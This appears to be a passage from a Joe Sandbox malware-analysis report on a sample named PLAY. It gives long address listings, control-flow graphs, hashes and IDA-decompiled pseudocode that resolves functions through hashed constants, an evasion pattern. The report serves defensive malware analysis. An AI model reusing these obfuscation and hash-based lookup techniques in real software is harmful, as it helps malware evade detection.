          0x00ae363f
          0x00ae364d
          0x00ae3653
          0x00ae3659
          0x00ae3663
          0x00ae3663
          0x00ae3665
          0x00ae3665
          0x00ae3670
          0x00ae3675
          0x00ae3680
          0x00ae3689
          0x00ae3691
          0x00ae3697
          0x00ae369e
          0x00ae36a4
          0x00ae36aa
          0x00ae36b4
          0x00ae36b7
          0x00ae36bd
          0x00ae36c4
          0x00ae36c9
          0x00ae36dc
          0x00ae36ea
          0x00ae3700
          0x00ae370d
          0x00ae370f
          0x00ae3711
          0x00ae3717
          0x00ae371e
          0x00ae372a
          0x00ae372d
          0x00ae3738
          0x00ae373a
          0x00ae3758
          0x00ae375e
          0x00ae3764
          0x00ae3767
          0x00ae3772
          0x00ae377b
          0x00ae3786
          0x00ae3790
          0x00ae3796
          0x00ae379c
          0x00ae37a2
          0x00ae37ba
          0x00ae37c6
          0x00ae37cc
          0x00ae37ce
          0x00ae37d4
          0x00ae37da
          0x00ae37e6
          0x00ae37ed
          0x00ae37f4
          0x00ae37f6
          0x00ae37fc
          0x00ae381a
          0x00ae381c
          0x00ae3820
          0x00ae3826
          0x00ae3832
          0x00ae3838
          0x00ae3a88
          0x00ae3a99
          0x00ae3aa0
          0x00ae3aa3
          0x00ae3aad
          0x00ae3ac6
          0x00ae3ad2
          0x00ae3ad4
          0x00ae3ada
          0x00ae3af0
          0x00ae3b0a
          0x00ae3b0c
          0x00ae3b19
          0x00ae3b22
          0x00ae3b29
          0x00ae3b36
          0x00ae3b38
          0x00ae3b39
          0x00ae3b3e
          0x00ae3b46
          0x00ae3b55
          0x00ae3b61
          0x00ae3b6d
          0x00ae3b74
          0x00ae3b7f
          0x00ae3b8b
          0x00ae3b94
          0x00ae3b9e
          0x00ae3ba4
          0x00ae3bb2
          0x00ae3bb9
          0x00ae3bbb
          0x00ae3bc1
          0x00ae3bd5
          0x00ae3be8
          0x00ae3bf8
          0x00ae3bfd
          0x00ae3c04
          0x00ae3c07
          0x00ae3c0d
          0x00ae3c14
          0x00ae3c16
          0x00ae3c5a
          0x00ae3c5f
          0x00ae3c66
          0x00ae3c66
          0x00ae3c67
          0x00ae3c6d
          0x00000000
          0x00ae3c18
          0x00ae3c18
          0x00ae3c23
          0x00ae3c28
          0x00ae3c2f
          0x00ae3c36
          0x00ae3c41
          0x00ae3c48
          0x00ae3c48
          0x00ae3c36
          0x00ae383e
          0x00ae3856
          0x00ae385b
          0x00ae3868
          0x00ae3889
          0x00ae38aa
          0x00ae38b0
          0x00ae38bc
          0x00ae38bd
          0x00ae38c4
          0x00ae38ce
          0x00ae38da
          0x00ae38f8
          0x00ae38fa
          0x00ae3906
          0x00ae3908
          0x00ae3909
          0x00ae3920
          0x00ae3928
          0x00ae3935
          0x00ae3949
          0x00ae394b
          0x00ae3954
          0x00ae395f
          0x00ae3962
          0x00ae3972
          0x00ae3978
          0x00ae3983
          0x00ae398c
          0x00ae399b
          0x00ae39a0
          0x00ae39a3
          0x00ae39aa
          0x00ae39ac
          0x00ae3a4b
          0x00ae3a52
          0x00ae3a5d
          0x00ae3a65
          0x00ae3c77
          0x00ae3c7d
          0x00ae3c80
          0x00ae3c86
          0x00ae3c8b
          0x00ae3c91
          0x00ae3c93
          0x00ae3c99
          0x00ae3ca3
          0x00ae3cae
          0x00ae3cb5
          0x00ae3cbc
          0x00ae3cc1
          0x00ae3cc7
          0x00ae3cd0
          0x00ae3cd0
          0x00ae3cd7
          0x00ae3cd9
          0x00ae3cdf
          0x00ae3ce6
          0x00ae3ce6
          0x00ae3ce6
          0x00ae3ceb
          0x00ae3cf1
          0x00ae3cf1
          0x00ae3d03
          0x00ae3d0b
          0x00ae3d0d
          0x00ae3d15
          0x00ae3d1f
          0x00ae3d25
          0x00ae3d2a
          0x00ae3d2d
          0x00ae3d2f
          0x00ae3d67
          0x00ae3d6a
          0x00ae3d70
          0x00ae3dbd
          0x00ae3dc2
          0x00ae3d72
          0x00ae3d78
          0x00ae3d84
          0x00ae3d8a
          0x00ae3d93
          0x00ae3da1
          0x00ae3da3
          0x00ae3da9
          0x00ae3daf
          0x00ae3daf
          0x00ae3dc8
          0x00ae3dce
          0x00ae3dd3
          0x00ae3de0
          0x00ae3de3
          0x00ae3de3
          0x00ae3de5
          0x00ae3de8
          0x00ae3df0
          0x00ae3df0
          0x00ae3df6
          0x00ae3dfc
          0x00ae3dfc
          0x00ae3dfc
          0x00ae3e07
          0x00ae3e0e
          0x00ae3e17
          0x00ae3e17
          0x00ae3e19
          0x00ae3e1f
          0x00ae3e25
          0x00ae3e2b
          0x00ae3e30
          0x00ae3e30
          0x00ae3e33
          0x00ae3e36
          0x00ae3e36
          0x00ae3e36
          0x00ae3e3b
          0x00ae3e41
          0x00ae3e47
          0x00ae3e4f
          0x00ae3e5e
          0x00ae3e5e
          0x00ae3e64
          0x00ae3e6c
          0x00ae3e6c
          0x00ae3e6e
          0x00ae3e74
          0x00ae3e7a
          0x00ae3e80
          0x00ae3e80
          0x00ae3e83
          0x00ae3e83
          0x00ae3e83
          0x00ae3e88
          0x00ae3e88
          0x00ae3eab
          0x00ae3ebd
          0x00ae3ec9
          0x00ae3ecb
          0x00ae3ed2
          0x00ae3ed7
          0x00ae3edf
          0x00ae3ee4
          0x00ae3ee9
          0x00ae3eef
          0x00ae3efb
          0x00ae3f00
          0x00ae3f11
          0x00ae3f1e
          0x00ae3f2c
          0x00ae3f37
          0x00ae3f39
          0x00ae3f41
          0x00ae3f48
          0x00ae3f4e
          0x00ae3f54
          0x00ae3f5f
          0x00ae3f62
          0x00ae3f66
          0x00ae3f6f
          0x00ae3f72
          0x00ae3f78
          0x00ae3f7f
          0x00ae3f81
          0x00ae4020
          0x00ae4027
          0x00ae402a
          0x00ae4033
          0x00ae4042
          0x00ae4044
          0x00ae4044
          0x00ae4044
          0x00ae404a
          0x00ae4050
          0x00ae4056
          0x00ae405c
          0x00ae4062
          0x00ae4062
          0x00ae4065
          0x00ae4068
          0x00ae406a
          0x00ae4070
          0x00ae4070
          0x00ae4070
          0x00ae4075
          0x00ae407b
          0x00ae4081
          0x00ae4081
          0x00ae408c
          0x00ae4091
          0x00ae409c
          0x00ae40a2
          0x00ae40a8
          0x00ae40c0
          0x00ae40c8
          0x00ae40cd
          0x00ae40d3
          0x00ae40d5
          0x00ae40d9
          0x00ae40e4
          0x00ae40ef
          0x00ae40f8
          0x00ae4106
          0x00ae410c
          0x00ae4118
          0x00ae4124
          0x00ae4130
          0x00ae4138
          0x00ae4139
          0x00ae415c
          0x00ae4162
          0x00ae4164
          0x00ae416f
          0x00ae4184
          0x00ae418c
          0x00ae4194
          0x00ae4197
          0x00ae419d
          0x00ae419f
          0x00ae41a5
          0x00ae41a7
          0x00ae41ad
          0x00ae41b3
          0x00ae41b9
          0x00ae41bb
          0x00ae4212
          0x00ae4218
          0x00ae421a
          0x00ae428f
          0x00ae428f
          0x00ae4294
          0x00ae429b
          0x00ae42a1
          0x00ae42a7
          0x00ae42ae
          0x00ae42b9
          0x00ae42c7
          0x00ae42d5
          0x00ae42d8
          0x00ae42df
          0x00ae42e2
          0x00ae42ee
          0x00ae42f9
          0x00ae42ff
          0x00ae4309
          0x00ae430c
          0x00ae4312
          0x00ae431d
          0x00ae4322
          0x00ae432c
          0x00ae4336
          0x00ae4336
          0x00ae4339
          0x00ae433f
          0x00ae421c
          0x00ae421c
          0x00ae421e
          0x00000000
          0x00ae4220
          0x00ae4228
          0x00ae4235
          0x00ae4245
          0x00ae424b
          0x00ae424e
          0x00ae425b
          0x00ae426e
          0x00ae4271
          0x00ae4277
          0x00ae427d
          0x00ae4283
          0x00ae4283
          0x00ae421e
          0x00ae434c
          0x00ae4352
          0x00ae435b
          0x00ae4360
          0x00ae4366
          0x00ae436c
          0x00ae4370
          0x00ae437f
          0x00ae4398
          0x00ae439e
          0x00ae43a5
          0x00ae43ab
          0x00ae43ad
          0x00ae43bf
          0x00ae43c5
          0x00ae43ca
          0x00ae43d0
          0x00ae43d5
          0x00ae43d7
          0x00ae443b
          0x00ae443e
          0x00ae43d9
          0x00ae43d9
          0x00ae43df
          0x00ae43df
          0x00ae43e8
          0x00ae43e8
          0x00ae43f0
          0x00ae43f0
          0x00ae43f0
          0x00ae43f6
          0x00ae43f9
          0x00ae43fb
          0x00ae4402
          0x00ae4408
          0x00ae4409
          0x00ae441a
          0x00ae4423
          0x00ae4423
          0x00ae4427
          0x00000000
          0x00000000
          0x00000000
          0x00ae4429
          0x00ae4429
          0x00ae4429
          0x00ae442d
          0x00ae4433
          0x00ae43db
          0x00ae43db
          0x00ae43dd
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00ae43dd
          0x00ae43d9
          0x00ae4450
          0x00ae4452
          0x00ae445b
          0x00ae4460
          0x00ae4461
          0x00ae4463
          0x00ae4465
          0x00ae4467
          0x00ae446c
          0x00ae4471
          0x00ae4477
          0x00ae447a
          0x00ae4481
          0x00ae4487
          0x00ae4489
          0x00ae448f
          0x00ae44a6
          0x00ae44b3
          0x00ae44be
          0x00ae44d3
          0x00ae44db
          0x00ae44ea
          0x00ae44f1
          0x00ae44f1
          0x00ae44f3
          0x00ae44f3
          0x00ae44ff
          0x00ae450a
          0x00ae450d
          0x00ae4513
          0x00ae4515
          0x00ae451c
          0x00ae452b
          0x00ae452d
          0x00ae4530
          0x00ae4537
          0x00ae4540
          0x00ae4549
          0x00ae4550
          0x00ae4550
          0x00ae4550
          0x00ae4540
          0x00ae455a
          0x00ae455f
          0x00ae4565
          0x00ae456a
          0x00ae456c
          0x00ae456e
          0x00ae4574
          0x00ae4574
          0x00ae457b
          0x00ae4581
          0x00ae4581
          0x00ae4590
          0x00ae4590
          0x00ae4590
          0x00ae4590
          0x00ae4597
          0x00ae459f
          0x00ae45a0
          0x00ae45a7
          0x00ae45a9
          0x00ae45af
          0x00ae45c0
          0x00ae45c7
          0x00ae45d0
          0x00ae45d2
          0x00ae45d2
          0x00ae45da
          0x00000000
          0x00000000
          0x00000000
          0x00ae45dc
          0x00ae45dc
          0x00ae45dc
          0x00ae4570
          0x00ae4570
          0x00ae4572
          0x00000000
          0x00000000
          0x00ae4572
          0x00ae456e
          0x00ae45e0
          0x00ae45e0
          0x00ae45e7
          0x00ae466b
          0x00ae4676
          0x00ae4677
          0x00ae467c
          0x00ae4682
          0x00ae4685
          0x00ae468c
          0x00ae46a5
          0x00ae46ad
          0x00ae46ba
          0x00ae46be
          0x00ae46c7
          0x00ae46d0
          0x00ae46e5
          0x00ae46e5
          0x00ae46eb
          0x00ae46f2
          0x00ae468e
          0x00ae4690
          0x00ae4692
          0x00000000
          0x00ae4694
          0x00ae469c
          0x00ae469c
          0x00ae4692
          0x00ae46f8
          0x00ae45e9
          0x00ae45ef
          0x00ae4610
          0x00ae461d
          0x00ae4647
          0x00ae464d
          0x00ae4654
          0x00ae4654
          0x00ae41bd
          0x00ae41bd
          0x00ae41c3
          0x00ae41cf
          0x00ae41fa
          0x00ae4200
          0x00ae4206
          0x00ae4206
          0x00000000
          0x00ae3f87
          0x00ae3f8d
          0x00ae3f9e
          0x00ae3fa4
          0x00ae3fb5
          0x00ae3fc4
          0x00ae3fd1
          0x00ae3fd8
          0x00ae4015
          0x00ae3fda
          0x00ae3fe7
          0x00ae3ff7
          0x00ae4001
          0x00ae4001
          0x00ae3fd8
          0x00ae3d31
          0x00ae3d3d
          0x00ae3d46
          0x00ae3d4c
          0x00ae3d54
          0x00ae3d5b
          0x00000000
          0x00ae3d5b
          0x00ae39b2
          0x00ae39b2
          0x00ae39b5
          0x00ae39c2
          0x00ae39d1
          0x00ae39d9
          0x00ae39e0
          0x00ae39e6
          0x00ae39ed
          0x00ae39fa
          0x00ae3a01
          0x00ae3a05
          0x00ae3a1c
          0x00ae3a2a
          0x00ae3a31
          0x00ae3a31
          0x00000000
          0x00ae39e0
          0x00ae39ac
          0x00ae37fe
          0x00ae37fe
          0x00ae3803
          0x00ae46fd
          0x00ae46fd
          0x00ae46fd
          0x00ae4720
          0x00ae4727
          0x00ae4729
          0x00ae4730
          0x00ae4737
          0x00ae4740
          0x00ae4740
          0x00ae4747
          0x00ae4747
          0x00ae4747
          0x00ae4752
          0x00ae4758
          0x00ae475b
          0x00ae4760
          0x00ae4768
          0x00ae4770
          0x00ae477f
          0x00ae477f
          0x00ae4781
          0x00ae4788
          0x00ae4788
          0x00ae478e
          0x00ae4794
          0x00ae4799
          0x00ae47a0
          0x00ae47a0
          0x00ae47a3
          0x00ae47a6
          0x00ae47a6
          0x00ae47a6
          0x00ae47ab
          0x00ae47b4
          0x00ae47c2
          0x00ae47c5
          0x00ae47c8
          0x00ae47ca
          0x00ae47ca
          0x00ae47d0
          0x00ae47d5
          0x00ae47d7
          0x00ae47d7
          0x00ae47d7
          0x00ae47d0
          0x00ae47e3
          0x00ae47ee
          0x00ae35b2
          0x00ae35c5
          0x00ae35c5

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: V.X$&$*$+ $7bb#$MDv3aP$OpaqueKeyBlob$_$a$crops$oNGiBx$r9tF1hgl$rAE2QR$ut>${G"
          • API String ID: 0-2688841112
          • Opcode ID: 745c93f502bd4449840252c800bde88a77cf5ba016d3fd8e083482f0fc989f52
          • Instruction ID: 5d8b37b9838f2854a0868b490bb35657524111bc25887466316f3a9f62fec703
          • Opcode Fuzzy Hash: 745c93f502bd4449840252c800bde88a77cf5ba016d3fd8e083482f0fc989f52
          • Instruction Fuzzy Hash: DCD26A75D092F88ADB218B698C547EDBBB1AF6A300F0441EAD48CA7392DA344FC5CF55
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AE5D3E Relevance: 29.1, APIs: 3, Strings: 13, Instructions: 1082COMMONCrypto
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 176 ae5d3e-ae5d45 177 ae5d6b-ae5d7a 176->177 178 ae5d47-ae5d57 176->178 179 ae5d8f-ae616b 177->179 180 ae5d7c 177->180 181 ae61be-ae62bf 179->181 182 ae616d-ae617b 179->182 184 ae62f5-ae6335 call ae2ef0 181->184 185 ae62c1-ae62f2 181->185 183 ae6180-ae61a8 182->183 183->183 186 ae61aa-ae61b8 183->186 188 ae633a-ae633f 184->188 185->184 186->181 189 ae636e-ae6375 188->189 190 ae6341-ae6369 188->190 192 ae6377-ae63a1 189->192 193 ae63a4-ae63c2 189->193 191 ae6f4f-ae6f80 190->191 196 ae6f83-ae6f8f 191->196 192->193 194 ae63da-ae643b 193->194 195 ae63c4-ae63d0 193->195 198 ae643d 194->198 199 ae6499-ae64d9 194->199 197 ae63d3-ae63d8 195->197 196->196 200 ae6f91-ae6fbc 196->200 197->194 197->197 202 ae643f-ae6446 198->202 203 ae6448-ae6497 198->203 204 ae64dc-ae6582 call b02fa0 199->204 201 ae6fc3-ae6fcc 200->201 201->201 205 ae6fce-ae6ff2 call aeeea0 call af7b30 201->205 202->199 202->203 203->204 210 ae65be-ae65f1 call aee7e0 204->210 211 ae6584-ae65ba 204->211 215 ae65f6-ae65fb 210->215 211->210 216 ae65fd-ae664b 215->216 217 ae6650-ae66c4 call aee380 215->217 216->191 219 ae66c9-ae66ce 217->219 220 ae66f5-ae673f 219->220 221 ae66d0-ae66f0 219->221 222 ae6793-ae67d9 call aee7e0 220->222 223 ae6741-ae674c 220->223 221->191 226 ae67de-ae67e3 222->226 223->222 224 ae674e-ae6790 223->224 224->222 227 ae6806-ae682a 226->227 228 ae67e5-ae6801 226->228 229 ae682c-ae6858 227->229 230 ae685a-ae68b5 227->230 228->191 231 ae68bb-ae68cd 229->231 230->231 232 ae6bca-ae6be9 call ae47f0 231->232 233 ae68d3 231->233 238 ae6bee-ae6c15 232->238 235 ae68d5-ae68da 233->235 236 ae68e0-ae696b call b02ef0 call b02fa0 233->236 235->232 235->236 246 ae6a91-ae6aa2 236->246 247 ae6971 236->247 240 ae6c49-ae6d11 call aee7e0 238->240 241 ae6c17-ae6c44 238->241 245 ae6d16-ae6d48 240->245 241->191 248 ae6d4a-ae6d54 245->248 249 ae6d76-ae6dc6 call ae47f0 245->249 254 ae6f3c-ae6f48 246->254 255 ae6aa8-ae6ad1 call ae47f0 246->255 251 ae697d-ae699a 247->251 252 ae6973-ae6977 247->252 248->191 253 ae6d5a-ae6d5d 248->253 257 ae6dcb-ae6e00 249->257 258 ae69a0-ae69bf call ae47f0 251->258 252->246 252->251 253->191 259 ae6d63-ae6d71 253->259 254->191 260 ae6ad6-ae6adb 255->260 261 ae6e6f-ae6ed3 call aee380 257->261 262 ae6e02-ae6e0a 257->262 269 ae69c4-ae6a02 258->269 259->191 264 ae6b84-ae6bc5 260->264 265 ae6ae1-ae6b34 260->265 272 ae6ed8-ae6edd 261->272 266 ae6e3f-ae6e54 262->266 267 ae6e0c-ae6e14 262->267 264->254 265->191 271 ae6e57-ae6e6a 266->271 267->266 270 ae6e16-ae6e3d 267->270 273 ae6a08-ae6a80 269->273 274 ae6b39-ae6b7f 269->274 270->271 271->191 275 ae6edf-ae6f17 272->275 276 ae6f19-ae6f39 272->276 273->258 277 ae6a86 273->277 274->191 275->191 276->254 277->246 278 ae6a88-ae6a8b 277->278 278->246 278->258
          C-Code - Quality: 45%
          			E00AE5D3E(void* __eax, void* __ebx, void* __edi, void* __eflags) {

				asm("adc [ebp+0x52e39f74], ah");
				if(__eflags == 0) {
					asm("in eax, 0x5d");
					return __eax;
				} else {
					asm("jecxz 0x54");
					if(__eflags != 0) {
						asm("aad 0xf8");
						asm("clc");
						asm("rcl byte [ebx], cl");
						asm("sbb dl, 0x3d");
						__eax = __eax | 0x292e3afe;
						__eflags = __eax;
						ds = es;
						if (__eax != 0) goto L10;
						asm("adc ecx, edi");
					} else {
						asm("scasb");
						asm("invalid");
						__eflags =  *((intOrPtr*)(__edi + 0x2b)) - __ebp;
						__esp = __esp ^  *(__ebx - 0x7c9d522e);
						__eflags = __esp;
						 *__esp =  *__esp + 0x4e;
						__eflags =  *__esp;
						return __eax;
					}
				}
			}



          0x00ae5d3e
          0x00ae5d41
          0x00ae5ce2
          0x00ae5ce4
          0x00ae5d43
          0x00ae5d43
          0x00ae5d45
          0x00ae5d6b
          0x00ae5d6c
          0x00ae5d6d
          0x00ae5d6f
          0x00ae5d74
          0x00ae5d74
          0x00ae5d79
          0x00ae5d7a
          0x00ae5d7b
          0x00ae5d47
          0x00ae5d47
          0x00ae5d49
          0x00ae5d4b
          0x00ae5d4e
          0x00ae5d4e
          0x00ae5d53
          0x00ae5d53
          0x00ae5d57
          0x00ae5d57
          0x00ae5d45

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID:
          • String ID: "$4$G$HQye$O$P$RE2Q2E$WLzYu$aPai$objRR$say3E$swcPq$x
          • API String ID: 0-862736249
          • Opcode ID: e4ce78a9e70f9583a6d594a17b97d9f48936909ac801f74fb267123b87e1d14d
          • Instruction ID: 9374bde1361f08a694a0f224e49d49780b1c5bc944db0b93ff18f8f1b98469da
          • Opcode Fuzzy Hash: e4ce78a9e70f9583a6d594a17b97d9f48936909ac801f74fb267123b87e1d14d
          • Instruction Fuzzy Hash: 65B26A34D052E88EDF25CFA9C8507EDBBB1AF29304F0441DAE498B7292EA345AC5DF15
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEC7D9 Relevance: 25.3, APIs: 7, Strings: 7, Instructions: 800COMMONCrypto
          Download Yara Rule

          Control-flow Graph

          C-Code - Quality: 64%
          			E00AEC7D9(void* __eax, void* __ebx, void* __esi, void* __fp0) {
				intOrPtr _t128;
				char _t130;
				intOrPtr _t131;
				signed short _t155;
				signed short _t169;
				signed short _t172;
				void* _t185;
				intOrPtr _t192;
				intOrPtr _t196;
				void* _t215;
				void* _t220;
				void* _t221;
				void* _t222;
				struct HINSTANCE__* _t236;
				struct HINSTANCE__* _t249;
				struct HINSTANCE__* _t253;
				struct HINSTANCE__* _t259;
				struct HINSTANCE__* _t267;
				struct HINSTANCE__* _t280;
				struct HINSTANCE__* _t285;
				void* _t291;
				signed short _t303;
				void* _t305;
				void* _t307;
				signed short _t329;
				signed char _t429;
				signed int _t432;
				signed short _t442;
				void* _t524;
				signed int _t525;
				signed short _t527;
				void* _t529;
				signed int _t539;
				void* _t644;

				_t644 = __fp0;
				_t529 = __esi;
				_t305 = __ebx;
				_t128 =  *((intOrPtr*)("G3cVs")); // 0x56633347
				_t525 = 0xeb7;
				 *((intOrPtr*)(_t539 - 0xa4)) = _t128;
				asm("movups [ebp-0xf0], xmm0");
				 *(_t539 - 0xa0) =  *0xb091a0 & 0x0000ffff;
				asm("movups xmm0, [0xb0917c]");
				_t130 = "Cicw48T"; // 0x77636943
				 *((intOrPtr*)(_t539 - 0xb0)) = _t130;
				_t131 =  *0xb091a8; // 0x543834
				asm("movups [ebp-0x110], xmm0");
				 *((intOrPtr*)(_t539 - 0xac)) = _t131;
				asm("movq xmm0, [0xb09190]");
				asm("movq [ebp-0xbc], xmm0");
				_t432 =  *(_t539 - 0xbc) >> 0x00000008 & 0x000000ff;
				 *(_t539 - 0x8c) = 0xeb7;
				 *(_t539 - 0x8e) = 0xd9;
				 *(_t539 - 0x79) = 0xd8;
				if(_t432 > 0x56) {
					_t429 =  *((intOrPtr*)(_t539 - 0xa1));
					_t524 = _t432 + 0xffffffaa;
					do {
						_t429 = (_t429 << 3) - _t429 + (_t429 << 3) - _t429;
						_t524 = _t524 - 1;
					} while (_t524 != 0);
				}
				_t530 = E00AEBE80(_t305, _t307, _t525, _t529, _t644);
				 *(_t539 - 0x8d) =  *((intOrPtr*)(_t539 - 0xb7)) + 1;
				 *(_t539 - 0x7b) =  *((intOrPtr*)(_t539 - 0xac)) + 1;
				_push(0);
				 *(_t539 - 0x84) =  *((intOrPtr*)(_t539 - 0xee)) + 0x00000001 & 0x0000ffff;
				 *0xb0d6f4 = E00AEC4D0( *((intOrPtr*)(_t539 - 0xee)) + 0x00000001 & 0x0000ffff, _t305, _t134, 0xbe8203b4, _t525, _t134);
				_push(1);
				 *(_t539 - 0x88) = 0x2051;
				 *(_t539 - 0x80) = ( *(_t539 - 0xa0) & 0x000000ff) * ( *(_t539 - 0x84) & 0x0000ffff);
				 *0xb0d6a8 = E00AEC4D0(0x2052, _t305, _t134, 0x2307b1a7, _t525, _t134);
				if( *(_t539 - 0x84) != 0 &&  *((char*)(_t539 - 0xba)) != 0) {
					 *(_t539 - 0x8c) = _t525;
				}
				_push(1);
				 *0xb0d6a0 = E00AEC4D0(0xffff, _t305, _t530, 0x19a330f3, _t525, _t530);
				_t526 =  *(_t539 - 0x88) & 0x0000ffff;
				_push(1);
				 *(_t539 - 0xc4) = ( *(_t539 - 0x80) & 0x000000ff) * ( *(_t539 - 0xa2) & 0x000000ff);
				 *(_t539 - 0x9c) =  *(_t539 - 0x88) & 0x0000ffff;
				 *0xb0d698 = E00AEC4D0( *(_t539 - 0x88) & 0x0000ffff, _t305, _t530, 0x2c75f7f6,  *(_t539 - 0x88) & 0x0000ffff, _t530);
				_t155 =  *(_t539 - 0x84) - 0x00000001 & 0x0000ffff;
				 *(_t539 - 0x84) = _t155;
				_push(1);
				 *(_t539 - 0x94) = _t155 & 0x0000ffff;
				 *0xb0d654 = E00AEC4D0(_t155 & 0x0000ffff, _t305, _t530, 0xc54f85bd,  *(_t539 - 0x88) & 0x0000ffff, _t530);
				_push(1);
				 *0xb0d69c = E00AEC4D0(_t157, _t305, _t530, 0x9748dd14,  *(_t539 - 0x88) & 0x0000ffff, _t530);
				_push(1);
				 *(_t539 - 0x8f) =  *((intOrPtr*)(_t539 - 0xee)) -  *((intOrPtr*)(_t539 - 0xbb)) + 0x35;
				 *0xb0d6dc = E00AEC4D0( *((intOrPtr*)(_t539 - 0xee)) -  *((intOrPtr*)(_t539 - 0xbb)) + 0x35, _t305, _t530, 0x80cd7e0c,  *(_t539 - 0x88) & 0x0000ffff, _t530);
				_push(1);
				 *0xb0d618 = E00AEC4D0(_t162, _t305, _t530, 0xc60149b9,  *(_t539 - 0x88) & 0x0000ffff, _t530);
				_push(1);
				 *0xb0d6e8 = E00AEC4D0(_t163, _t305, _t530, 0x7e556724,  *(_t539 - 0x88) & 0x0000ffff, _t530);
				if(( *(_t539 - 0x8e) & 0x000000ff) - ( *(_t539 - 0x8d) & 0x000000ff) - 1 != 1) {
					_t169 =  *(_t539 - 0x84);
					_t442 = _t169 & 0x0000ffff;
					 *(_t539 - 0x94) = _t169 & 0x0000ffff;
					 *((short*)(_t539 - 0x7c)) =  *((intOrPtr*)(_t539 - 0x10a));
					_t172 =  *(_t539 - 0x94);
					_t329 = ( *(_t539 - 0x8f) & 0x000000ff) -  *(_t539 - 0x94) + ( *(_t539 - 0x7b) & 0x000000ff) & 0x0000ffff;
				} else {
					_t329 = 1;
					 *(_t539 - 0x88) = 1;
					 *((short*)(_t539 - 0x7c)) =  *((intOrPtr*)(_t539 - 0x10a)) + 1;
					_t303 =  *(_t539 - 0x84);
					_t442 = _t303 & 0x0000ffff;
					_t172 = _t303 & 0x0000ffff;
				}
				 *(_t539 - 0x98) = _t172 & 0x0000ffff;
				 *(_t539 - 0x94) = _t442 & 0x0000ffff;
				_push(1);
				 *(_t539 - 0x84) = _t329 & 0x0000ffff;
				 *0xb0d650 = E00AEC4D0(_t329 & 0x0000ffff, _t305, _t530, 0x783255a6, _t526, _t530);
				_push(1);
				E00AEC4D0(_t176, _t305, _t530, 0x30d336e1, _t526, _t530);
				if( *(_t539 - 0x80) == 0) {
					 *(_t539 - 0x8c) =  *(_t539 - 0x84) & 0x0000ffff;
					_t180 =  *((intOrPtr*)(_t539 - 0xae));
					 *(_t539 - 0x79) =  *((intOrPtr*)(_t539 - 0xae));
				} else {
					 *(_t539 - 0x79) =  *((intOrPtr*)(_t539 - 0xae)) + 1;
					_t180 = ( *(_t539 - 0xc4) & 0x000000ff) * ( *(_t539 - 0xea) & 0x0000ffff) & 0x0000ffff;
					 *(_t539 - 0x8c) = ( *(_t539 - 0xc4) & 0x000000ff) * ( *(_t539 - 0xea) & 0x0000ffff) & 0x0000ffff;
				}
				_push(1);
				 *0xb0d61c = E00AEC4D0(_t180, _t305, _t530, 0xa14beb5d, _t526, _t530);
				_push(1);
				 *0xb0d660 = E00AEC4D0(_t181, _t305, _t530, 0x87992849, _t526, _t530);
				_push(1);
				 *0xb0d6b4 = E00AEC4D0(_t182, _t305, _t530, 0xef00a85f, _t526, _t530);
				_push(1);
				 *0xb0d664 = E00AEC4D0(_t183, _t305, _t530, 0x8ad1d5c3, _t526, _t530);
				_push(1);
				_t185 = E00AEC4D0(_t184, _t305, _t530, 0x5a4d6a7e, _t526, _t530);
				_push(1);
				 *0xb0d62c = E00AEC4D0(_t185, _t305, _t530, 0xf29fc861, _t526, _t530);
				_push(1);
				 *0xb0d684 = E00AEC4D0(_t186, _t305, _t530, 0xbdcd4a4f, _t526, _t530);
				_push(1);
				 *0xb0d648 = E00AEC4D0(_t187, _t305, _t530, 0xc08880ed, _t526, _t530);
				_push(1);
				 *0xb0d6c0 = E00AEC4D0(_t188, _t305, _t530, 0x4493b7b7, _t526, _t530);
				 *(_t539 - 0x80) =  *(_t539 - 0x80) - ( *(_t539 - 0x79) & 0x000000ff) + ( *(_t539 - 0x10e) & 0x0000ffff);
				_push(1);
				 *0xb0d700 = E00AEC4D0( *(_t539 - 0x10e) & 0x0000ffff, _t305, _t530, 0x928c170d, _t526, _t530);
				_push(1);
				_t192 = E00AEC4D0(_t191, _t305, _t530, 0x4bf279e3, _t526, _t530);
				_t527 =  *((intOrPtr*)(_t539 - 0x7c));
				 *0xb0d6c8 = _t192;
				 *((intOrPtr*)(_t539 - 0xac)) = 0;
				_push(1);
				 *(_t539 - 0x8c) = ( *(_t539 - 0xa2) & 0x000000ff) + (_t527 & 0x0000ffff);
				 *0xb0d688 = E00AEC4D0(( *(_t539 - 0xa2) & 0x000000ff) + (_t527 & 0x0000ffff), _t305, _t530, 0x9b674bff, _t527, _t530);
				_push(1);
				_t196 = E00AEC4D0(_t195, _t305, _t530, 0x3bbded58, _t527, _t530);
				 *(_t539 - 0x80) =  *(_t539 - 0x80) + 0x4bf0;
				 *0xb0d60c = _t196;
				_push(1);
				 *0xb0d658 = E00AEC4D0(_t196, _t305, _t530, 0x84ea1e3b, _t527, _t530);
				_push(1);
				 *0xb0d680 = E00AEC4D0(_t197, _t305, _t530, 0xe0f6decf, _t527, _t530);
				_push(1);
